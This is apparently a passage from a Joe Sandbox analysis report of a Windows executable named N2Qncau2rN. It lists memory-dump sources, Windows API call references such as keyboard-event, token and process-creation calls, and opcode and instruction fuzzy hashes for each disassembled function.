• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
• Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
• Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
• Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
• Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
• Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
• Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00444B34
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _malloc_memmove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1183979061-0
                                                                                                                                                                                                                • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                                                                                                • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __lock_file
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3031932315-0
                                                                                                                                                                                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 040DE2F1
Memory Dump Source
• Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(00A2F2E8,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(00A2F2E8,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,02E71A38,00000000,?,?,?,?), ref: 0047CF1C
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
• SendMessageW.USER32 ref: 0047CF6B
• ClientToScreen.USER32(?,?), ref: 0047CFB5
• TrackPopupMenuEx.USER32(?,00000080,?,?,02E71A38,00000000,?,?,?,?), ref: 0047CFE6
• GetWindowLongW.USER32(?,000000F0), ref: 0047D086
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3100379633-4164748364
APIs
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• IsIconic.USER32(?), ref: 0043444F
• ShowWindow.USER32(?,00000009), ref: 0043445C
• SetForegroundWindow.USER32(?), ref: 0043446A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
• GetCurrentThreadId.KERNEL32 ref: 00434485
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
• SetForegroundWindow.USER32(00000000), ref: 004344B7
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
• keybd_event.USER32(00000012,00000000), ref: 004344E6
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
• keybd_event.USER32(00000012,00000000), ref: 004344FD
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
• keybd_event.USER32(00000012,00000000), ref: 00434514
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                • API String ID: 2889586943-2988720461
                                                                                                                                                                                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• CloseHandle.KERNEL32(?), ref: 004463A0
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• GetProcessWindowStation.USER32 ref: 004463D1
• SetProcessWindowStation.USER32(00000000), ref: 004463DB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
• _wcslen.LIBCMT ref: 00446498
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _wcsncpy.LIBCMT ref: 004464C0
• LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
• CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
• UnloadUserProfile.USERENV(?,?), ref: 00446555
• CloseWindowStation.USER32(00000000), ref: 0044656C
• CloseDesktop.USER32(?), ref: 0044657A
• SetProcessWindowStation.USER32(?), ref: 00446588
• CloseHandle.KERNEL32(?), ref: 00446592
• DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
• String ID: $@OH$default$winsta0
• API String ID: 3324942560-3791954436
• Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
• Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
• Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
• Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
• FindClose.KERNEL32(00000000), ref: 00478924
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
• __swprintf.LIBCMT ref: 004789D3
• __swprintf.LIBCMT ref: 00478A1D
• __swprintf.LIBCMT ref: 00478A4B
• __swprintf.LIBCMT ref: 00478A79
  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
• __swprintf.LIBCMT ref: 00478AA7
• __swprintf.LIBCMT ref: 00478AD5
• __swprintf.LIBCMT ref: 00478B03
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 999945258-2428617273
• Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
• Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
• Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
• Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
• __wsplitpath.LIBCMT ref: 00403492
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscpy.LIBCMT ref: 004034A7
• _wcscat.LIBCMT ref: 004034BC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
• _wcscpy.LIBCMT ref: 004035A0
• _wcslen.LIBCMT ref: 00403623
• _wcslen.LIBCMT ref: 0040367D
Strings
• _, xrefs: 0040371C
• Error opening the file, xrefs: 00428231
                                                                                                                                                                                                                • Unterminated string, xrefs: 00428348
                                                                                                                                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                • API String ID: 3393021363-188983378
